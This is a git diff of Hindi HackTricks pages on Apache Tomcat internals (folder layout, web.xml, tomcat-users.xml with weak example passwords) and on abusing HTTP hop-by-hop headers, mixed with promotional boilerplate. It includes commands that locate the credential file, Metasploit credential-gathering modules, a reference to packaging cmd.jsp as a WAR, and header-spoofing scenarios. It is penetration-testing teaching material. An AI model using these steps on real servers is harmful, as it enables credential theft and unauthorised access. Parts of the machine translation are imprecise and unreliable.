```bash
@ -248,11 +216,11 @@ zip -r backup.war cmd.jsp
```
## POST
Tomcat क्रेडेंशियल फ़ाइल का नाम _tomcat-users.xml_ है।
टॉमकैट क्रेडेंशियल्स फ़ाइल का नाम _tomcat-users.xml_ है।
```bash
find / -name tomcat-users.xml 2>/dev/null
```
Tomcat क्रेडेंशियल्स इकट्ठा करने के अन्य तरीके:
टॉमकैट क्रेडेंशियल्स जुटाने के अन्य तरीके:
```bash
msf> use post/multi/gather/tomcat_gather
msf> use post/windows/gather/enum_tomcat
@ -260,22 +228,3 @@ msf> use post/windows/gather/enum_tomcat
## अन्य टॉमकैट स्कैनिंग टूल
* [https://github.com/p0dalirius/ApacheTomcatScanner](https://github.com/p0dalirius/ApacheTomcatScanner)
<details>
<figure><img src="/.gitbook/assets/image (675).png" alt=""><figcaption></figcaption></figure>
विकर्षक आपके सबसे महत्वपूर्ण संकटों को खोजता है ताकि आप उन्हें तेजी से ठीक कर सकें। इंट्रूडर आपकी हमला क्षेत्र का पता लगाता है, प्रोएक्टिव धारणा स्कैन चलाता है, एपीआई से वेब ऐप्स और क्लाउड सिस्टम तक आपकी पूरी टेक स्टैक में मुद्दों को खोजता है। [**इसे नि: शुल्क में आज़माएं**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks)।
{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी को HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करने की आवश्यकता है? [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) की जांच करें!
* खोजें [**The PEASS Family**](https://opensea.io/collection/the-peass-family), हमारा विशेष संग्रह [**NFTs**](https://opensea.io/collection/the-peass-family)
* प्राप्त करें [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)** का पालन करें।**
* **अपने हैकिंग ट्रिक्स को [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके साझा करें।**
</details>

View file

@ -1,20 +1,20 @@
# मूलभूत टॉमकैट जानकारी
# मूल टॉमकैट जानकारी
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ हैकट्रिक्स क्लाउड ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 ट्विटर 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ ट्विच 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 यूट्यूब 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करने की आवश्यकता है? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष संग्रह [**NFTs**](https://opensea.io/collection/the-peass-family)
* [**आधिकारिक PEASS और HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)** का पालन करें।**
* **अपने हैकिंग ट्रिक्स को [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके साझा करें।**
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का हैकट्रिक्स में विज्ञापन देखना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण या हैकट्रिक्स को पीडीएफ में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जांच करें!
* [**द पीएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटीएस**](https://opensea.io/collection/the-peass-family) संग्रह।
* [**आधिकारिक पीएस और हैकट्रिक्स स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **ट्विटर** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** पर** **फॉलो** करें।
* **हैकिंग ट्रिक्स साझा करें, [हैकट्रिक्स रेपो](https://github.com/carlospolop/hacktricks) और [हैकट्रिक्स-क्लाउड रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके**
</details>
<figure><img src="/.gitbook/assets/image (675).png" alt=""><figcaption></figcaption></figure>
िशेषता को ध्यान में रखते हुए विकल्पों को खोजें ताकि आप उन्हें तेजी से ठीक कर सकें। Intruder आपकी हमला सतह का ट्रैक करता है, प्रोएक्टिव धमकी स्कैन चलाता है, एपीआई से वेब ऐप्स और क्लाउड सिस्टम तक आपके पूरे टेक स्टैक में मुद्दों का पता लगाता है। [**आज ही मुफ्त में इसे प्रयास करें**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks)।
े सुरक्षा गड़बड़ियों को खोजें जो सबसे अधिक मायने रखती हैं ताकि आप उन्हें तेजी से ठीक कर सकें। इंट्रूडर आपकी हमले की सतह का ट्रैक करता है, प्रोएक्टिव धारणा स्कैन चलाता है, आपकी पूरी तकनीकी स्टैक, एपीआई से वेब ऐप्स और क्लाउड सिस्टम तक मुद्दे खोजता है। [**यह नि: शुल्क ट्राय करें**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) आज
{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}
@ -22,7 +22,7 @@
### रूट के साथ न चलाएं
टॉमकैट को रूट के साथ न चलाने के लिए एक बहुत सामान्य कॉन्फ़िगरेशन है कि पोर्ट 80/443 में एक अपाची सर्वर सेट किया जाता है और यदि अनुरोधित पथ एक रेजेक्स के साथ मेल खाता है, तो अनुरोध एक अलग पोर्ट पर चल रहे टॉमकैट को भेजा जाता है।
रूट के साथ टॉमकैट न चलाने के लिए एक बहुत ही सामान्य कॉन्फ़िगरेशन है कि पोर्ट 80/443 में एक एपाच सर्वर सेट करना और, यदि अनुरोधित पथ एक रेगेक्स से मेल खाता है, तो अनुरोध टॉमकैट को एक विभिन्न पोर्ट पर चलाया जाता है।
### डिफ़ॉल्ट संरचना
```
@ -49,15 +49,14 @@
└── Catalina
└── localhost
```
* `WEB-INF` folder: This folder contains the web application's configuration files and classes.
* `META-INF` folder: This folder contains the application's metadata files, such as the manifest file.
* Other files and folders: These can include HTML, CSS, JavaScript, and other resources used by the web application.
* `bin` फ़ोल्डर में स्क्रिप्ट और बाइनरी स्टोर किए जाते हैं जो टॉमकैट सर्वर को शुरू और चलाने के लिए आवश्यक होते हैं।
* `conf` फ़ोल्डर में विभिन्न कॉन्फ़िगरेशन फ़ाइलें स्टोर की जाती हैं जो टॉमकैट द्वारा उपयोग की जाती हैं।
* `tomcat-users.xml` फ़ाइल उपयोगकर्ता क्रेडेंशियल्स और उनके दायित्विक भूमिकाएँ स्टोर करती है।
* `lib` फ़ोल्डर में टॉमकैट के सही काम के लिए आवश्यक विभिन्न JAR फ़ाइलें होती हैं।
* `logs` और `temp` फ़ोल्डर अस्थायी लॉग फ़ाइलें स्टोर करते हैं।
* `webapps` फ़ोल्डर टॉमकैट का डिफ़ॉल्ट वेबरूट है और सभी एप्लिकेशन्स को होस्ट करता है। `work` फ़ोल्डर एक कैश के रूप में काम करता है और रनटाइम के दौरान डेटा स्टोर करने के लिए उपयोग किया जाता है।
To access the Tomcat server, you can use a web browser and navigate to `http://<ip_address>:<port>`. The default port for Tomcat is 8080.
To exploit vulnerabilities in Tomcat, you can use various techniques such as directory traversal, file inclusion, and remote code execution. These techniques can allow an attacker to gain unauthorized access, execute arbitrary code, or retrieve sensitive information.
It is important to regularly update Tomcat to the latest version and apply security patches to mitigate potential vulnerabilities. Additionally, strong passwords should be used for user accounts and unnecessary services should be disabled to reduce the attack surface.
`webapps` के अंदर हर फ़ोल्डर की निम्नलिखित संरचना होनी चाहिए।
```
webapps/customapp
├── images
@ -74,10 +73,10 @@ webapps/customapp
└── classes
└── AdminServlet.class
```
सभी फ़ाइलों में सबसे महत्वपूर्ण फ़ाइल `WEB-INF/web.xml` है, जिसे डिप्लॉयमेंट विवरणकारी के रूप में जाना जाता है। इस फ़ाइल में **रूट्स के बारे में जानकारी** और इन रूट्स को हैंडल करने वाली कक्षाएं संग्रहीत होती हैं।\
एप्लिकेशन द्वारा उपयोग की जाने वाली सभी कंपाइल की गई कक्षाएं `WEB-INF/classes` फ़ोल्डर में संग्रहीत होनी चाहिए। इन कक्षाओं में महत्वपूर्ण व्यावसायिक तर्क और संवेदनशील जानकारी हो सकती है। इन फ़ाइलों में किसी भी सुरक्षा कमजोरी से वेबसाइट का पूर्ण संक्रमण हो सकता है। `lib` फ़ोल्डर उस विशेष एप्लिकेशन के लिए आवश्यक पुस्तकालयों को संग्रहत करता है। `jsp` फ़ोल्डर [जकार्ता सर्वर पेज (JSP)](https://en.wikipedia.org/wiki/Jakarta\_Server\_Pages) को संग्रहीत करता है, जिसे पहले `JavaServer Pages` के नाम से जाना जाता था, जो एक Apache सर्वर पर PHP फ़ाइलों के समान हो सकते ह
सभी में से सबसे महत्वपूर्ण फ़ाइल `WEB-INF/web.xml` है, जिसे डिप्लॉयमेंट डिस्क्रिप्टर के रूप में जाना जाता है। इस फ़ाइल में **ऐसी जानकारी संग्रहीत है जो एप्लिकेशन द्वारा उपयोग किए जाने वाले रूट्स के बारे में** और इन रूट्स को हैंडल करने वाली कक्षाएँ के बारे में है।\
एप्लिकेशन द्वारा उपयोग किए जाने वाले सभी कंपाइल कक्षाएँ `WEB-INF/classes` फ़ोल्डर में संग्रहीत होनी चाहिए। ये कक्षाएँ महत्वपूर्ण व्यावसायिक तर्क और संवेदनशील जानकारी भी संग्रहित कर सकती हैं। इन फ़ाइलों में कोई भी सुरक्षा दोष वेबसाइट का पूरी तरह से कमजोर होने की ओर ले जा सकता है। `lib` फ़ोल्डर उस विशेष एप्लिकेशन के लिए आवश्यक पुस्तकालयों को संग्रहित करता है। `jsp` फ़ोल्डर [जकार्ता सर्वर पेज्स (JSP)](https://en.wikipedia.org/wiki/Jakarta\_Server\_Pages) को संग्रहित करता है, जिसे पहले `JavaServer Pages` के रूप में जाना जाता था, जो एक अपाचे सर्वर पर PHP फ़ाइलों के समान है।
यहा एक उदाहरण **web.xml** फ़ाइल है।
यहा एक उदाहरण **web.xml** फ़ाइल है।
```xml
<?xml version="1.0" encoding="ISO-8859-1"?>
@ -95,15 +94,15 @@ webapps/customapp
</servlet-mapping>
</web-app>
```
ऊपर दिए गए `web.xml` कॉन्फ़िगरेशन में एक **नया सर्वलेट `AdminServlet`** परिभाषित किया गया है जो **`com.inlanefreight.api.AdminServlet`** क्लास से मैप किया गया है। जावा पैकेज नाम बनाने के लिए डॉट नोटेशन का उपयोग करता है, इसका मतलब है कि ऊपर परिभाषित क्लास के लिए डिस्क पर पथ होगा:
ऊपर दिया गया `web.xml` कॉन्फ़िगरेशन एक **नया सर्वलेट जिसका नाम `AdminServlet`** है को **कक्ष `com.inlanefreight.api.AdminServlet`** से मैप करता है। जावा डॉट नोटेशन का उपयोग पैकेज नाम बनाने के लिए करता है, इसका मतलब ऊपर परिभाषित कक्ष के लिए डिस्क पर पथ होगा:
* **`classes/com/inlanefreight/api/AdminServlet.class`**
अगले, एक नया सर्वलेट मैपिंग बनाया जाता है जो **`/admin` के लिए `AdminServlet` के साथ मैप करता है**। यह कॉन्फ़िगरेशन किसी भी अनुरोध को **`/admin` के लिए `AdminServlet.class`** क्लास को प्रोसेस करने के लिए भेजेगा। **`web.xml`** डिस्क्रिप्टर में बहुत सारी **संवेदनशील जानकारी** होती है और यह एक महत्वपूर्ण फ़ाइल है जो एक **स्थानिक फ़ाइल सम्मिलन (LFI) संवेदनशीलता** का उपयोग करते समय जांचने के लिए होती है।
अगले, एक नया सर्वलेट मैपिंग बनाया जाता है **`AdminServlet` के साथ `/admin` के लिए अनुरोधों को मैप करने के लिए**। यह कॉन्फ़िगरेशन किसी भी अनुरोध को **`/admin` के लिए `AdminServlet.class`** कक्ष को प्रोसेस करने के लिए भेजेगा। **`web.xml`** विवरणकर्ता में कई **संवेदनशील जानकारी** होती है और यह एक महत्वपूर्ण फ़ाइल है जो जांचने के लिए होती है जब एक **स्थानीय फ़ाइल समावेशन (LFI) वंशावली** का लाभ उठाया जाता है।
### tomcat-users
**`tomcat-users.xml`** फ़ाइल का उपयोग **`/manager` और `host-manager` व्यवस्थापक पृष्ठों** के लिए पहुंच को **अनुमति देने** या न देने के लिए किया जाता है।
**`tomcat-users.xml`** फ़ाइल का उपयोग **`/manager` और `host-manager` व्यवस्थापक पृष्ठों** तक पहुंच की अनुमति देने या न देने के लिए किया जाता है।
```xml
<?xml version="1.0" encoding="UTF-8"?>
@ -144,7 +143,7 @@ will also need to set the passwords to something appropriate.
</tomcat-users>
```
यह फ़ाइल हमें दिखाती है कि प्रत्येक भूमिका `manager-gui`, `manager-script`, `manager-jmx` और `manager-status` किसक पहुंच प्रदान करती है। इस उदाहरण में, हम देख सकते हैं कि एक उपयोगकर्ता `tomcat` जिसका पासवर्ड `tomcat` है, के पास `manager-gui` भूमिका है, और एक दूसरा कमजोर पासवर्ड `admin` उपयोगकर्ता खाते `admin` के लिए सेट किया गया है।
यह फ़ाइल हमें दिखाती है कि प्रत्येक भूमिका `manager-gui`, `manager-script`, `manager-jmx`, और `manager-status` किसक पहुंच प्रदान करती है। इस उदाहरण में, हम देख सकते हैं कि एक उपयोगकर्ता `tomcat` जिसका पासवर्ड `tomcat` है, के पास `manager-gui` भूमिका है, और एक दूसरा कमजोर पासवर्ड `admin` उपयोगकर्ता खाते `admin` के लिए सेट किया गया है।
## संदर्भ
@ -152,7 +151,7 @@ will also need to set the passwords to something appropriate.
<figure><img src="/.gitbook/assets/image (675).png" alt=""><figcaption></figcaption></figure>
िशेषता को ढूंढें जो सबसे अधिक मायने रखती है ताकि आप उन्हें तेजी से ठीक कर सकें। Intruder आपकी हमला सतह का ट्रैक करता है, प्रोएक्टिव धमकी स्कैन चलाता है, एपीआई से वेब ऐप्स और क्लाउड सिस्टम तक आपके पूरे टेक स्टैक में मुद्दों को खोजता है। [**इसे आजमाएं मुफ्त में**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks)।
ो विकल्प खोजें जो सबसे अधिक मायने रखते हैं ताकि आप उन्हें तेजी से ठीक कर सकें। Intruder आपकी हमले की सतह का ट्रैक करता है, प्रोएक्टिव धारणा स्कैन चलाता है, आपकी पूरी तकनीकी स्टैक, API से वेब ऐप्स और क्लाउड सिस्टम तक मुद्दे खोजता है। [**आज ही मुफ्त में इसका प्रयास करें**](https://www.intruder.io/?utm_source=referral\&utm_campaign=hacktricks)।
{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}
@ -161,10 +160,10 @@ will also need to set the passwords to something appropriate.
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने की सुविधा** चाहिए? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
* खोजें [**The PEASS Family**](https://opensea.io/collection/the-peass-family), हमारा विशेष संग्रह [**NFTs**](https://opensea.io/collection/the-peass-family)
* प्राप्त करें [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)** का पालन करें।**
* **अपने हैकिंग ट्रिक्स साझा करें, [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके।**
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप चाहते हैं कि आपकी **कंपनी को HackTricks में विज्ञापित** किया जाए? या क्या आप **PEASS के नवीनतम संस्करण को देखना चाहते हैं या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जाँच करें!
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, **The PEASS Family** की खोज करें
* प्राप्त करें [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com)
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **ट्विटर** पर **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **अपने हैकिंग ट्रिक्स साझा करें, [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud)** को PR जमा करके।
</details>

View file

@ -7,43 +7,11 @@
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप चाहते हैं कि आपकी **कंपनी को हैकट्रिक्स में विज्ञापित किया जाए**? या क्या आपको **PEASS के नवीनतम संस्करण देखना है या HackTricks को PDF में डाउनलोड करना है**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जाँच करें!
* [**द पीएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटी**](https://opensea.io/collection/the-peass-family) संग्रह।
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें।
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **ट्विटर** पर **फॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**।**
* **अपने हैकिंग ट्रिक्स साझा करें, [हैकट्रिक्स रेपो](https://github.com/carlospolop/hacktricks) और [हैकट्रिक्स-क्लाउड रेपो](https://github.com/carlospolop/hacktricks-cloud)** में पीआर जमा करके।
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **ट्विटर** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** पर **फॉलो** करें।
* **अपने हैकिंग ट्रिक्स साझा करें, [हैकट्रिक्स रेपो](https://github.com/carlospolop/hacktricks) और [हैकट्रिक्स-क्लाउड रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके**
</details>
**यह पोस्ट [https://nathandavison.com/blog/abusing-http-hop-by-hop-request-headers](https://nathandavison.com/blog/abusing-http-hop-by-hop-request-headers) का सारांश है**
हॉप-बाय-हॉप हेडर्स एकल परिवहन स्तर कनेक्शन के लिए विशेष होते हैं, मुख्य रूप से HTTP/1.1 में डेटा प्रबंधन के लिए उपयोग किए जाते हैं (जैसे क्लाइंट-प्रॉक्सी या प्रॉक्सी-प्रॉक्सी के बीच), और आगे नहीं भेजे जाने के लिए होते हैं। मानक हॉप-बाय-हॉप हेडर्स में `Keep-Alive`, `Transfer-Encoding`, `TE`, `Connection`, `Trailer`, `Upgrade`, `Proxy-Authorization`, और `Proxy-Authenticate` शामिल हैं, जैसा कि [RFC 2616](https://tools.ietf.org/html/rfc2616#section-13.5.1) में परिभाषित है। अतिरिक्त हेडर्स को `Connection` हेडर के माध्यम से हॉप-बाय-हॉप नामित किया जा सकता है।
### हॉप-बाय-हॉप हेडर्स का दुरुपयोग
प्रॉक्सी द्वारा हॉप-बाय-हॉप हेडर्स का अनुचित प्रबंधन सुरक्षा समस्याओं में ले जा सकता है। जबकि प्रॉक्सी से इन हेडर्स को हटाने की उम्मीद होती है, सभी ऐसा नहीं करते, जिससे संभावित भेदभाव हो सकता है।
### हॉप-बाय-हॉप हेडर्स हैंडलिंग के लिए टेस्टिंग
हॉप-बाय-हॉप हेडर्स के हैंडलिंग को टेस्ट किया जा सकता है जब विशेष हेडर्स को हॉप-बाय-हॉप बताया जाता है, सर्वर प्रतिक्रियाओं में परिवर्तनों को देखकर। उपकरण और स्क्रिप्ट इस प्रक्रिया को स्वचालित कर सकते हैं, प्रॉक्सी इन हेडर्स का प्रबंधन कैसे करते हैं और गलत कॉन्फ़िगरेशन या प्रॉक्सी व्यवहार का पता लगा सकते हैं।
हॉप-बाय-हॉप हेडर्स का दुरुपयोग विभिन्न सुरक्षा प्रभावों में ले जा सकता है। नीचे कुछ उदाहरण हैं जो दिखाते हैं कि इन हेडर्स को कैसे दुरुपयोग किया जा सकता है:
### `X-Forwarded-For` का उपयोग करके सुरक्षा नियंत्रण को छलना
एक हमलावर `X-Forwarded-For` हेडर को छलकर आईपी-आधारित पहुंच नियंत्रण को छल सकता है। यह हेडर अक्सर प्रॉक्सी द्वारा उपयोग किया जाता है ताकि प्रॉक्सी उपयोक्ता के मूल आईपी पते का पता लगा सके। हालांकि, यदि कोई प्रॉक्सी इस हेडर को हॉप-बाय-हॉप मानता है और उसे सही सत्यापन के बिना आगे भेजता है, तो हमलावर अपना आईपी पता छल सकता है।
**हमला स्थिति:**
1. हमलावर एक वेब एप्लिकेशन को प्रॉक्सी के पीछे एक HTTP अनुरोध भेजता है, `X-Forwarded-For` हेडर में एक नकली आईपी पता शामिल करता है।
2. हमलावर `Connection: close, X-Forwarded-For` हेडर भी शामिल करता है, जिससे प्रॉक्सी `X-Forwarded-For` को हॉप-बाय-हॉप मानता है।
3. गलत कॉन्फ़िगर किया गया प्रॉक्सी वेब एप्लिकेशन को छले बिना उस `X-Forwarded-For` हेडर के साथ आगे भेजता है।
4. वेब एप्लिकेशन, मूल `X-Forwarded-For` हेडर नहीं देखता, शायद अनधिकृत पहुंच के रूप में अनुमानित पहुंच के रूप में विचार कर सकता है, जिससे अनधिकृत पहुंच संभावित अनुमति दे सकती है।
### हॉप-बाय-हॉप हेडर इंजेक्शन के माध्यम से कैश पॉइजनिंग
यदि कैश सर्वर हॉप-बाय-हॉप हेडर्स पर आधारित सामग्री कैश करता है, तो हमलावर दुर्भाग्यपूर्ण हेडर्स डालकर कैश को पॉइजन कर सकता है। इससे उपयोगकर्ताओं को गलत या दुर्भाग्यपूर्ण सामग्री सेवित की जा सकती है।
**हमला स्थिति:**
1. एक हमलावर एक वेब एप्लिकेशन को एक हॉप-बाय-हॉप हेडर के साथ अनुरोध भेजता है जो कैश नहीं होना चाहिए (जैसे `Connection: close, Cookie`।)
2. खराब रूप से कॉन्फ़िगर किया गया कैश सर्वर हॉप-बाय-हॉप हेडर को हटाने में असफल रहता है और हमलावर के सत्र के लिए विशेष उत्तर प्रदान करता है।
3. भविष्य के उपयोगकर्ताओं को एक ही संसाधन का अनुरोध करने पर उन्हें हमलावर के लिए अनुकूलित उत्तर मिलता है, जो हमलावर के लिए विशेष था, जिससे सत्र हाइजैकिंग या संवेदनशील जानकारी का प्रकट हो सकता है।
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ हैकट्रिक्स क्लाउड ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 ट्विटर 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ ट्विच 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 यूट्यूब 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप चाहते हैं कि आपकी **कंपनी को हैकट्रिक्स में विज्ञापित किया जाए**? या क्या आपको **PEASS के नवीनतम संस्करण देखना है या HackTricks को PDF में डाउनलोड करना है**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जाँच करें!
* [**द पीएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा
हॉप-ब

View file

@ -1,70 +1,59 @@
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
- क्या आप किसी **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी को HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करने की आवश्यकता है? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
दूसरे तरीके HackTricks का समर्थन करने के लिए:
- खोजें [**The PEASS Family**](https://opensea.io/collection/the-peass-family), हमारा विशेष संग्रह [**NFTs**](https://opensea.io/collection/the-peass-family)
- प्राप्त करें [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com)
- **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में या मुझे **Twitter** पर **फ़ॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
- **अपने हैकिंग ट्रिक्स को [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके साझा करें।**
* अगर आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
* [**आधिकारिक PEASS & HackTricks swag प्राप्त करें**](https://peass.creator-spring.com)
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
* **शामिल हों** 💬 [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)** पर फॉलो** करें।
